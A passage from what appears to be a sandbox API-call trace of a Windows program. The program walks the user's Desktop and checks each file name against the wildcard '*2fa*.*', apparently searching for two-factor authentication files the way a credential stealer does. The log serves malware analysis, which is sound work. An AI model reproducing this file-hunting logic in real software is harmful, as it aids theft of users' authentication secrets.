out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif" [0110.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.864] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea398 [0110.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x38ea398, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", lpUsedDefaultChar=0x0) returned 50 [0110.864] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2db0 [0110.864] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea398 | out: hHeap=0x29a0000) returned 1 [0110.864] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.864] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aab28 [0110.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aab28, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.865] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab28 | out: hHeap=0x29a0000) returned 1 [0110.865] PathMatchSpecW (pszFile="PKW-syaNOG91rV.gif", pszSpec="*2fa*.*") returned 0 [0110.865] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2db0 | out: hHeap=0x29a0000) returned 1 [0110.865] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0cbd0, ftCreationTime.dwHighDateTime=0x1d7a4cc, ftLastAccessTime.dwLowDateTime=0x9ce51cb0, ftLastAccessTime.dwHighDateTime=0x1d7a54b, ftLastWriteTime.dwLowDateTime=0x9ce51cb0, ftLastWriteTime.dwHighDateTime=0x1d7a54b, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="QjzdslaoFnrvJ.flv", cAlternateFileName="QJZDSL~1.FLV")) returned 1 [0110.865] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.865] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.865] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="QjzdslaoFnrvJ.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv" [0110.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.865] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea4d8 [0110.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x38ea4d8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", lpUsedDefaultChar=0x0) returned 49 [0110.865] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2e40 [0110.865] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea4d8 | out: hHeap=0x29a0000) returned 1 [0110.865] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.865] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaab0 [0110.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaab0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.865] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaab0 | out: hHeap=0x29a0000) returned 1 [0110.865] PathMatchSpecW (pszFile="QjzdslaoFnrvJ.flv", pszSpec="*2fa*.*") returned 0 [0110.865] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e40 | out: hHeap=0x29a0000) returned 1 [0110.865] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d327160, ftCreationTime.dwHighDateTime=0x1d7aa85, ftLastAccessTime.dwLowDateTime=0x45629f70, ftLastAccessTime.dwHighDateTime=0x1d7ac63, ftLastWriteTime.dwLowDateTime=0x45629f70, ftLastWriteTime.dwHighDateTime=0x1d7ac63, nFileSizeHigh=0x0, nFileSizeLow=0x11a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QqfcEGsF2dGoVC.mp4", cAlternateFileName="QQFCEG~1.MP4")) returned 1 [0110.865] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.865] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.865] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="QqfcEGsF2dGoVC.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4" [0110.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.865] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea198 [0110.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x38ea198, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", lpUsedDefaultChar=0x0) returned 50 [0110.865] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2f18 [0110.865] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea198 | out: hHeap=0x29a0000) returned 1 [0110.866] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.866] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaac8 [0110.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaac8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.866] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaac8 | out: hHeap=0x29a0000) returned 1 [0110.866] PathMatchSpecW (pszFile="QqfcEGsF2dGoVC.mp4", pszSpec="*2fa*.*") returned 0 [0110.866] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2f18 | out: hHeap=0x29a0000) returned 1 [0110.866] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bf0caa0, ftCreationTime.dwHighDateTime=0x1d7af0e, ftLastAccessTime.dwLowDateTime=0xada19040, ftLastAccessTime.dwHighDateTime=0x1d7af75, ftLastWriteTime.dwLowDateTime=0xada19040, ftLastWriteTime.dwHighDateTime=0x1d7af75, nFileSizeHigh=0x0, nFileSizeLow=0x1311b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSkrbDuTIF.m4a", cAlternateFileName="SSKRBD~1.M4A")) returned 1 [0110.866] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.866] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.866] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="SSkrbDuTIF.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a" [0110.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.866] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x39700d0 [0110.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x39700d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", lpUsedDefaultChar=0x0) returned 46 [0110.866] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.866] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.866] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.866] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaac8 [0110.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaac8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.866] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaac8 | out: hHeap=0x29a0000) returned 1 [0110.866] PathMatchSpecW (pszFile="SSkrbDuTIF.m4a", pszSpec="*2fa*.*") returned 0 [0110.866] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.866] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285d0430, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0xcfb35a10, ftLastAccessTime.dwHighDateTime=0x1d7ad22, ftLastWriteTime.dwLowDateTime=0xcfb35a10, ftLastWriteTime.dwHighDateTime=0x1d7ad22, nFileSizeHigh=0x0, nFileSizeLow=0xc05d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StgqeHlfrw0.m4a", cAlternateFileName="STGQEH~1.M4A")) returned 1 [0110.866] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.866] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.866] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="StgqeHlfrw0.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a" [0110.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.867] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x39700d0 [0110.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x39700d0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", lpUsedDefaultChar=0x0) returned 47 [0110.867] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.867] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.867] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.867] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaae0 [0110.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaae0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.867] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0110.867] PathMatchSpecW (pszFile="StgqeHlfrw0.m4a", pszSpec="*2fa*.*") returned 0 [0110.867] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.867] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cc60f70, ftCreationTime.dwHighDateTime=0x1d7a02f, ftLastAccessTime.dwLowDateTime=0xa9de71c0, ftLastAccessTime.dwHighDateTime=0x1d7a585, ftLastWriteTime.dwLowDateTime=0xa9de71c0, ftLastWriteTime.dwHighDateTime=0x1d7a585, nFileSizeHigh=0x0, nFileSizeLow=0x1280, dwReserved0=0x0, dwReserved1=0x0, cFileName="SWeD.odt", cAlternateFileName="")) returned 1 [0110.867] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.867] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.867] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="SWeD.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt" [0110.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0110.867] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x28) returned 0x29a3168 [0110.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x29a3168, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", lpUsedDefaultChar=0x0) returned 40 [0110.867] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.867] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a3168 | out: hHeap=0x29a0000) returned 1 [0110.867] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb028 | out: hHeap=0x29a0000) returned 1 [0110.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.867] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aac48 [0110.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aac48, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.867] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac48 | out: hHeap=0x29a0000) returned 1 [0110.867] PathMatchSpecW (pszFile="SWeD.odt", pszSpec="*2fa*.*") returned 0 [0110.867] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.867] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a932a00, ftCreationTime.dwHighDateTime=0x1d7a7f6, ftLastAccessTime.dwLowDateTime=0x6167a550, ftLastAccessTime.dwHighDateTime=0x1d7ae78, ftLastWriteTime.dwLowDateTime=0x6167a550, ftLastWriteTime.dwHighDateTime=0x1d7ae78, nFileSizeHigh=0x0, nFileSizeLow=0x9172, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQk58h 9TQk7yvi7D.mkv", cAlternateFileName="UQK58H~1.MKV")) returned 1 [0110.867] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.868] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.868] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="UQk58h 9TQk7yvi7D.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv" [0110.868] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.868] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.868] lstrcatW (in: lpString1="\\", lpString2="UQk58h 9TQk7yvi7D.mkv" | out: lpString1="\\UQk58h 9TQk7yvi7D.mkv") returned="\\UQk58h 9TQk7yvi7D.mkv" [0110.868] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.868] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x38ea758 [0110.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x38ea758, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", lpUsedDefaultChar=0x0) returned 53 [0110.868] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0110.868] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea758 | out: hHeap=0x29a0000) returned 1 [0110.868] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.868] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaae0 [0110.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaae0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.868] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0110.868] PathMatchSpecW (pszFile="UQk58h 9TQk7yvi7D.mkv", pszSpec="*2fa*.*") returned 0 [0110.868] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0110.868] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8827190, ftCreationTime.dwHighDateTime=0x1d7aa97, ftLastAccessTime.dwLowDateTime=0x8be18a00, ftLastAccessTime.dwHighDateTime=0x1d7ac64, ftLastWriteTime.dwLowDateTime=0x8be18a00, ftLastWriteTime.dwHighDateTime=0x1d7ac64, nFileSizeHigh=0x0, nFileSizeLow=0xefc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="VAHC8zDa9SevTeoKicIh.docx", cAlternateFileName="VAHC8Z~1.DOC")) returned 1 [0110.868] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.868] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.868] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="VAHC8zDa9SevTeoKicIh.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx" [0110.868] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.868] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.868] lstrcatW (in: lpString1="\\", lpString2="VAHC8zDa9SevTeoKicIh.docx" | out: lpString1="\\VAHC8zDa9SevTeoKicIh.docx") returned="\\VAHC8zDa9SevTeoKicIh.docx" [0110.868] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.869] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a2810 [0110.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x29a2810, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", lpUsedDefaultChar=0x0) returned 57 [0110.869] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0110.869] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2810 | out: hHeap=0x29a0000) returned 1 [0110.869] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.869] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29aaab0 [0110.869] MultiByteToWideChar (in: CodePage=0x0, 